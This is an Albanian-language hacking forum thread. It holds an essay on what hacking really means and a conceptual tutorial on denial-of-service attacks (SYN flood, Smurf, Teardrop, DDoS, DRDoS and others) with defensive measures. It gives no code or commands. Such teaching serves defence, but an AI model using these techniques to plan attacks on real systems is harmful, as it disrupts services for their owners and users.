Ata që quhen “cool techno wiz kids” lavdërohen për hakiratjen e akounteve të msn-ës a ku ta di unë në shkolla, apo jo? Hmmmm këtu është një fjale për ata persona, ndoshta nuk është e mire ashtu siç tingëllon. Edhe nëse ata i kanë kryer ato gjera unë të them se kanë përdor disa “lamers” programe të internetit që kanë shfrytëzuar paditurinë e njerëzve që fare s’marrin erë në kompjuter apo në internet. Nëse do të ishin të vërtet ata kurrë nuk do të tregonin se çfarë kanë bëre në tëre shkollën. Kështu që mesazhi im është nëse dëshiron të bëhesh një lloj “Super Hacker” duke qene parazit (pra duke u ushqyer në krah të të tjerëve) hapi sytë sepse je duke ëndërruar.  Pra ti je një fillestar dhe ti duhesh te mësosh bazën para se të bësh ndonjë gjë që t’iu lesh përshtypje shokëve të tu. Nëse fillon të lexosh, të lexosh dhe vetëm të lexosh ti do të korrësh frytet e hacking dhe do shohësh sa i mirë që mund të jetë.

Në paragrafin e fundit unë vetëm i kalova lehte mbi programet. Tani arsyeja që unë i minimizova programet është fakt i thjesht, që nëse ti shkrove një program, nuk është hacking. Çdo idiot mund të nis një program (Shpresoj!). Nëse fillon të përdoresh programet të cilat bëjnë çdo gjë për ty atëherë çfarë je duke mësuar. Dikur lexova diku në një nga qindra “hacking sites” se: “Hacking është përdorimi i diturisë për të fituar më shume dituri”. Atëherë i kalova ore të tëra duke menduar për të dhe të tregoj tani menjëherë se është definicioni më i mirë që kam dëgjuar ndonjëherë.

Tani nëse jeni një hacker mesatar apo më i mirë ti mund të kalosh këtë paragraf. Lexo ketë nëse të pëlqen. Po zgjat në mënyre të vazhdueshme kërkimi i të rinjve nëpër “chat roms” dhe “newsgroups” për njerëz inteligjent duke iu marre çdo “bit” durimi nga ata. Unë as që mund të numëroj të rinjët duke pyetur kështu: “Ju lutem më mëso të bej hack?” ose “Si të bëj hack?”. Nëse ke sadopak mendje ose pak tru ti kurrë nuk do ti flasësh këto fjalë nepër forume, chat rooms, newsgroups, ose në ndonjë lloj tjetër si këto. Unë nuk mund të filloj të tregoj ty se si zemërohesh nëse pyetesh me kësi pyetje të mendjelehtëve për shumë here me radhë. Dite pas dite, muaj pas muaji. E di që të jesh i ri të çdo gjë është vështire, por nëse ti insiston në bërjen e gjerave, atëherë ti do të jesh i pashmangshëm të mësosh të vërtetën e një gjëje. Mirëpo po e di që ti je ka brengosesh se si do te mësoj të hackesh atëherë? Do te përdoresh një makine kërkuese! Kërko pak këto gjëra si “hacking” dhe “computer security”. Nëse dëshiron të bisedosh me hacker të tjerë pyet pyetje specifike si “Din ndokush ndonjë URL të mirë”. Të tregoj se unë për ketë kohë që kam në hacking kam gjetur webet më te mira nga njerëzit në forume. Mos e zë në goje se nëse gjen ndonjë ueb të mirë atëherë bëhu i sinqerte dhe ndaje më të tjerët. Jam i sigurt që do të mirëpritesh.

Por çfare është hack i vërtet pra?

Kështu unë ju tregova se çfarë hacking nuk është. Tani le flasim se çfarë është. Hacking, siç e thash edhe më pare, është përdorimi i diturisë që ti zgjerosh kufijtë e diturisë. Tani, kjo do të thotë se ti duhesh të bëhesh familjar me sistemet operative në internet të cilat janë Unix dhe Windows. Port surfing është edhe një metode e respektueshme e hacking. Ti s’do të më besosh se sa gjera mund të mësohen nga port surfing. Hakeret lundrojnë në porte për të mësuar sa më shumë, aq sa është e mundshme për një sistem. Kjo është për arsye të rregullave të arta të thyerjes së sistemeve. Ti nuk mund të thyesh një sistem të cilin nuk e kupton. Tani të supozojmë e kemi gjetur fjalëkalimin dhe u futem brenda në sistem. Por çfarë do të bësh nëse hyn brenda. Pasi ti mësosh sistemet operative të ndryshme hapi tjetër është programimi të cilën kohët e fundit ia kam filluar.
Hackerët e vërtet janë inteligjent, ata duhet të jene. Gjithashtu ata bëjnë më të vërtet një pune të mirë në shkollë, sepse ata janë uritur për dituri. Ose nuk janë aq të mirë në shkollë sepse është tmerrësisht e mërzitshme. Dhe ajo të cilët janë të mërzitur nuk është sepse nuk ju ndien për mesim, përkundrazi ata janë të etur të mësojnë, çfarëdo që ju del para.  Një hacker i vërtet dëshiron të dijë çdo gjë. Ata janë të mërzitur në shkollë sepse shkollat mëson të njëjtat gjëra, përsëri përsëri dhe përsëri asgjë të re, asgjë sfiduese.
Hackeret e vërtet janë kurioz dhe këmbëngulës. Një hacker i vertet nuk hyn në sisteme për të shkatërruar çdo gjë që i del para. Hackerët e vërtet dëshirojnë të mëson, ose dëshiron ta kënaqin kuriozitetin e tyre, kjo është pse ata hyjnë në sisteme. Te eksplorojnë rreth e rrotull vendin ku ata nuk kanë qene më parë, të gjurmojnë të gjitha qoshet e vogla të botes.
Hackeret e vërtet i dallon mendimi, ata mendojnë ndryshe nga tjerët, pyesin ndryshe, janë të heshtur. Po mendoj ata i mbajnë zbulimet e tyre në brendësi.
Hmmm mendoj që mjafton. Gjithmonë kujtoje se çfarë është hackeri në të vërtet.
Logged
« Reply #6 on: July 19, 2008, 07:19:31 PM »
logic Offline
Jr. Member

 **
Posts: 60
Quote
Autori: logic
Mesimi: DoS



DoS Attacks

Sulmet Denial of Servive (DoS) janë ndër më të thjeshtat dhe më vulgare sot. DoS sulmet nuk kanë objektiv vjedhjen,  modifikimin apo shkatërrimin e informatave, por të pengoj adaptimin e një përdoruesi nga përdorimi i një pune. Një sulm DoS vjen në shumë mënyra, nga më te thjeshta ndarja e fuqisë së një sistemi, ose përmbytja e një sistemi derisa të adoptohet në trafikun e rrjetit. Natyra publike e internetit e bën veçanërisht me pika të dobëta (vulnerable) nga sulmet DoS. Sulmet DoS/DDoS të shpjeguara poshtë janë të gjitha të bazuara në rrjetet e sulmeve DoS. DoS/DDoS sulmet janë edhe sulme aktive, si sulmuesit në vazhdimësi përpiqen të ndërrojnë diçka, në ketë rast vlefshmërinë e një serveri.

TCP SYN Flood Attack
Një shembull i thjeshtë i sulmeve DoS është "TCP SYN flood attack". Një seancë TCP është e ngritur duke përdor mekanizma shtrëngim duarsh të trefishta, i cili i lejon klientit dhe "host"-tit që të sinkronizoj lidhjen dhe të pranoj sekuencat e numrave fillestar. Hosti i përgjigjet me një SYN / ACK, përsëri të sinkronizoj. Pastaj klienti pranon dërgesën e paketës SYN / ACK duke i dërguar ACK. Kur hosti pranon ACK lidhja bëhet e hapur, duke lejuar trafikun nga dy anët. Lidhja mbetet e hapur deri sa klienti apo hosti lëshon një FIN ose RST paket, ose lidhja ka rëne (time out). Procesi është i ilustruar poshtë:


                                
Në sulmet TCP SYN flood, sulmuesi krijon një lidhje TCP gjysmë të hapur duke i dërguar paketën fillestare SYN me një IP adresë të imituar, dhe kurrë nuk pranon SYN / ACK nga hosti me një ACK. Kjo eventualisht do të udhëheq drejt arritjes së limitit dhe ndalimin e pranimit të lidhjes nga përdoruesit e arsyeshëm. Shumë rutera sot janë në gjendje të detektojnë SYN floods duke monitoruar shumën e sezoneve TCP të mbetura pa përgjigje dhe duke i zhduk ato para se seanca të përfundoj. Ata shpesh mund të jene të konfiguruar që të caktojnë maksimumin e numrave të lejuar të konektimeve gjysmë të hapura, dhe limitin e shumës së kohës që hosti të pret për pranimin përfundimtar. Pa këto masa mbrojtëse, serveri mund eventualisht të del jashtë memories, duke shkaktuar falimentime absolute.

UDP Flood Attacks
UDP është një lidhje protokolli që nuk përdore mekanzima lidhje duarsh që të stabilizoj konektimin. Kjo gjë në mënyre relative është e lehte që të shpërdorohet për sulmet flood. Një sulm i zakonshëm UDP flood shpesh referohet si Pepsi attack, është një sulm ku sulmuesi dërgon një numër të madhe të paketa të imituara UDP në porte të rastësishme në host. Koha CPU, memorja, dhe bandwidth kërkon që të procedoj këto paketa që mund të bëjnë objektivin të pamundshëm për përdoruesit. Që ta minimizojmë rrezikun e sulmeve UDP flood, duhet të bëjmë disable UDP serviset e pa përdorshme në server dhe ti bllokojmë UDP portet e papërdorura me një firewall që ta mbroni rrjetin tuaj.

Ping of Death Attacks
Një tjerë sulm DoS i njohur mirë është Ping of Death. Sulmuesi dërgon një ICMP Echo kërkesë paket me një numër më të madh se 65,535 bytes,  duke shkaktuar te pranuesi buffer overflow (buffer overflow--kalim i cakut, kufirit) dhe objektivi apo viktima, sistemi i tij të shkoj në crash ose reboot. Posaçërisht sistemet operative Windows, por edhe sisteme te vjetra të MAC dhe Linux dhe pajisje rrjeti si router mund të jene vulnerable nga Ping of Death.
Sistemet operative moderne dhe pajisjet e rrjetit pa problem nuk i vejnë re këto  paketa mbi masë. Kurse sistemet operative mund zakonisht te bëjnë update me ndonjë patch.

Smurf Attacks
Sulm i rrezikshëm i DoS është ai Smurf attack, e cila ka mundësi te shkaktohet për shkak të konfigurimit të pajisjeve të rrjetit që përgjigjen të pasqyrimet e ICMP të dërguara te adresa transmetuese. Sulmuesi dërgon një sasia të madhe të ICMP trafikut të adresa transmetuese, dhe përdor IP adresën e viktimës si burim IP-je ashtu që përgjigja nga të gjitha pajisjet që i përgjigjen adresës transmetuese do ta përmbysin viktimën. Pjesa e rrezikshme e këtij sulmi është që sulmuesi mund të përdor një lidhje të dobët (low-bandwidth connection) që të rrezoj një lidhje të fortë (high-bandwidth connection). Sasia e trafikut e dërguar nga sulmuesi është e shumëfishuar nga një faktor që është i barabartë me numrin e hosteve prapa roterëve që i përgjigjet ICMP echo paketave.



  
Diagrami i mësipërm përshkruan një Smurf attack në progres. Sulmuesi dërgon paketa ICMP echo te ruteri ne 128KBps.
Sulmuesi i modifikon paketat duke ndërruar burimin e IP-ës të IP adresa e kompjuterit të viktimës ashtu që paketat imituese i do të dërgohen në adresën e caktuar. Destinacioni i adresës së paketave është "broadcast address" në ketë rast e kemi 129.64.255.255. Nëse ruteri s’është i konfiguruar që ti dërgoj përpara këto transmetime te hosti në anën tjetër te ruterit të gjitha këto hosti do t’iu përgjigjet. Në shembullin e mësipërm na jep të kuptojmë 640 Kbps (5 x 128 Kbps) të përgjigjeve ICMP do të dërgohen në sistemin e viktimës, ku e cili në mënyre efikase do të bëj të pa aftë lidhjen 512 Kbps.  Përveç objektiviteti të sistemit, edhe ruteri ndërmjetësuesi është gjithashtu viktimë, edhe gjithashtu ato hoste ne "Bounce Site". Një sulm i thjesht që përdor UDP transmetime të paketave në vend të ICMP transmetimeve te paktës është e quajtur si "Fraggle Attack".
Është e vështir ta pengosh një Smurf attack plotësisht sepse ato janë të krijuar vetëm për rrjetat e konfiguruar gabimisht. Për tu siguruar nga këto sulme të duhet të instalosh një firewall dhe ta konfigurosh mir ruterin.
Logged
« Reply #7 on: July 19, 2008, 07:19:51 PM »
logic Offline
Jr. Member

 **
Posts: 60
Teardrop Attacks
Kur të dhënat janë të dërguar përmes TCP/IP networkut, janë të ndara në copëza të vogla. Ato copëza përmbajnë fusha të kompresuara në TCP headers që përshkruajnë kur të dhënat fillojnë dhe mbarojnë. Në një sulm Teardrop, sulmuesi dërgon copëza jo valide të fushave të bllokuara në fushën e kompresuar, e cila mund të dërgoj sistemin e caktuar në crash kur provon ti rigrumbullon copëzat e të dhënave.

Bonk Attacks
Bonk sulmet janë më të thjeshta se Teardrop sulmet. Duke dërguar IP fragmente (copeza) me shkelje të fushave të kompresuara në TCP header, fusha  të kompresuara që janë shumë të mëdha. Kjo mund të shkaktoj që sistemi të shkoje në crash.

Land Attacks
Gjate sulmeve Land sulmuesi dërgon një TCP SYN paket të imituar më të njëjtën burim IP-je dhe destinacion adrese. Kjo e bën sistemin në siklet me versione të vjetruara të TCP/IP sepse pranon një TCP lidhje të kërkuar nga vet. Kjo mund të dërgoj sistemin në crash.

ICMP
ICMP është dizajnuar për të pasur kontroll dhe testuar mesazhet përmes "IP networks".
Ndryshe nga "Transport Layer" protokollet TCP (Transmission Control Protocol) dhe UDP (User Datagram Protocol) të cilat operojnë në baze të IP, ICMP ekziston anash IP.
Prapë se prapë, shumë vegla siguruese si firewalls bllokojnë ose ç’kyçin të gjitha pjesët e ICMP për arsye sigurimi.
ICMP Message Types
ICMP operon duke dërguar dhe pranuar numra të limituar të llojeve të mesazheve. ICMP mesazhet janë të definuara në LANA ICMP Type Numbers.


Llojet e mesazhet më të thjeshta ICMP janë:
  • Type   Name
  • 0   Echo Reply
  • 3   Destination Unreachable
  • 4   Source Quench
  • 5   Redirect
  • 6   Alternate Host Address
  • 8   Echo
  • 9   Router Advertisement
  • 10   Router Solicitation
  • 11   Time Exceeded
  • 12   Parameter Problem
  • 13   Timestamp
  • 14   Timestamp Reply
  • 15   Information Request
  • 16   Information Reply
  • 17   Address Mask Request
  • 18   Address Mask Reply
  • 30   Traceroute

UDP
User Datagram Protocol (UDP) është njëra ndër protokollet e Internet protocol suite. Duke përdor UDP, programet në rrjetat e kompjuterit mund të dërgojnë mesazhe të shkurta ndonjëherë të njohura si datagrams (duke përdor Datagram Sockets) të tjetri. UDP është e njohur nganjëherë edhe si Universal Datagram Protocol.

IDS
Intrusion detection system (IDS) zakonisht detekton manipulime të pa dëshiruara të sistemeve kompjuterike, kryesisht ndërmjet internetit. Manipulimet mund të marrin formën e sulmeve nga "crackers". Një IDS nuk mund të detektoj sulme të enkriptuara.
Intrusion detecion system është përdorur të detektoj pjesë të veçuara të dëmshme që mund të shkaktojnë dëm në sistemet kompjuterike. Kjo përfshin sulmet e rrjetit kundër vulnerable services, të dhëna të sulmuara në aplikacione, hosti i sulmuar si nga privilege escalation, qasje të paautorizuara që mendojnë të kenë qasje në fajllet e ndjeshëm, dhe malware (viruses, trojan horses dhe worms).

TTL Expiration
Sulmet TTL expiration shkojnë në drejtim të kontrollit të mesazheve ICMP për ta përmbyt (flood) viktimën. Ne ketë sulm, burimi i adresës është e imituar që të ketë përputhshmëri me adresën e viktimës. TTL për paketat është në një vlere të vogël që zhduket në trafik në një ruter me shpejtësi të madhe. Kur TTL e paketës arrin zeron, ruteri e gjuan paketën dhe dërgon një mesazh ICMP TTL expired  te burimi i adresës, në ketë rast sajti i viktimës. Që nga TTL expiration është bëre shpesh në karta interneti në ASIC, kjo mund të ketë shpejtësi ekstreme reflektive mediale.
Mënyra më e mirë qe të mbrohesh nga kësi lloj sulmi është që të limitojmë ICMP të gjitha ruterët vulnerable në pronarin e servisit të networkut. Disa networka janë duke ofruar që ta bëjn "off", ta ndalin procesimin e TTL expiration.

Distributed Denial of Service (DDoS) Attacks
Kur një sulmues sulmon nga burime të shumëfishta të sistemeve, është i quajtur si "Destributed Denial of Service (DDoS) attack". Nëse sulmuesi është në gjendje të organizoj një sasi të madhe te klientëve të konektuar, do të pranoj të kaloj përtej tyre. Prandaj, një denial of service do të ndodh. Kjo është një metodë e thjesht e përdorur nga "Hacktivist"-tet.
Megjithatë, sulmuesi në mënyrë tipike nuk i ka në pronësi këta kompjuter. Pronaret aktual zakonisht nuk janë të informuar për sistemin e tyre që po përdoret për një sulm DDoS. Sulmuesi zakonisht shpërndan Trojan Horses që përmbajne kode me qellim të keq (mailicious code) që e lejon sulmuesin ta kontrolloje sistemin e tyre. Si "malicious code" është edhe i referuar si "Backdoor". Kur njëherë këta Trojan Horses ekzekutohen, ata mund ti dërgojnë një email qeë ta informojnë se sistemi i tyre mund të kontrollohet nga ata (remotely controlled). Sulmuesi pastaj do të instaloj vegla (tools) që i duhen ta kryej sulmin. Kur sulmuesi munda ta kontrolloje mjaft mirë sistemin, të cilët mund të quhen si "zombies" ose "slaves", ai ose ajo mund të nis sulmin. Diagrami i mëposhtëm na shpjegon planë veprimet:

 
 
Në të shumtën e rasteve, është vështir apo ndoshta e pamundshme ta pengosh një sulm DDoS plotësisht. Disa rutera, firewall, dhe IDS janë në gjendje të detektojnë sulme DoS dhe të bllokojnë lidhje të dyshimta që të pengojnë serverin të ketë mbingarkesë (overloaded). Kur të jesh një viktimë i një sulmi DDoS në veprim e sipër, duhesh të kontaktosh ISP tënd që ta bllokosh IP adresën që shihet që mund të jetë burimi i sulmit. Megjithatë, sulmuesi krijon burim adresa të imituara, duke e bere shumë të veshit që ti gjurmosh burimin aktual të sulmit pa hyrje shtesë te korporatës së ISP tuaj.

Distributed Reflective Denial of Service (DRDoS) Attacks
Një sulm distributed reflective denial of service përdore kontrolle të mbledhura "remote" të kompjuterëve që ti dërgoj paketat e rreme te një media refleksive, në mënyre tipike te serverët ose ruterat në një sulme refleksivë i shpjeguar më poshtë. Figura na tregon për një DRDoS UDP dhe TCP një sulm flood. Siç na tregon diagrami është shumë vështir që të gjurmohet ky sulm sepse kontrollimi i kompjuterëve është dy shtresore e fshehur nga paketat e dërguara në sajtin e viktimës.
 


Në sulm DRDOS mund të përdor variante të ndryshme të sulmeve refleksive nga kompjuterët skllav nëpërmes hosteve refleksive të viktima. Trafiku nga kompjuteri kryesore të kompjuterët zombie (skllav) mund të jetë shumë i ulët, madje i fshehur me një normal ICMP echo reply ping paketa të cilat janë gati gjitha gjithmonë brenda networkut duke lejuar te kontrollohen kompjuterët skllav prapa firewalleve.

Mbrojtja nga sulmet DoS
Si sulmuesit të cilët gjejnë dobësi që të përdorën (vulnerabilities to be exploited) që të shkaktojnë sulme DoS, programerët e programeve apo me e rëndësishmja e  sistemeve operative bëjnë lëshimin e patcheve që ti mënjanojnë këto lloj sulme.. P.sh. Microsoft e ka rregulluar OS e vet që ti mënjanoj SYN Flooding duke i limituar numrin e kërkesave SYN që të ruhen në memorien e sistemit që ta pengoj të mos merr "overloaded" mbi ngarkese.. Mire kjo është vetëm një rast.. SYN Flooding mund të ekzekutohet në shumë mënyra dhe mund të shpjegohet në shumë mënyra në të ardhmën keto patche ndoshta s’do të mund të jene në gjendje ti pengojnë këto sulme.. Kështu unë mendoj se duke bere update programet dhe sistemet operative me patche nga krijuesit e tyre është e nevojshme të dijmë për sulmet të cilat janë bëre kundër nesh dhe dobësitë (vulnerabiliy) të cilat mund të përdoren (exploited) kundër nesh..
« Last Edit: July 19, 2008, 07:21:30 PM by logic » Logged
« Reply #8 on: July 19, 2008, 07:20:23 PM »
logic Offline
Jr. Member

 **
Posts: 60
Denial of Service Presentation
Logged
« Reply #9 on: July 19, 2008, 07:23:02 PM »
logic Offline
Jr. Member

 **
Posts: 60
easy4bendi hope u'll like..
enjoy  Cheesy
Logged
 
Tags:
Pages: [1] 2 3  All |   Go Up
  Send this topic  |  Print  
« previous next »
 
Jump to:  

SEKSIONE   Artikuj  |  Galeria  |  Tage

Na kontaktoni | Tregoja mikut | Ndihme | Kerko forumet

English Information | FAQ


Powered by SMF | SMF © 2006-2007, Simple Machines LLC
Seo4Smf v0.2 © Webmaster's Talks

design by Artcode. ©2008 ayih Organization. All rights reserved.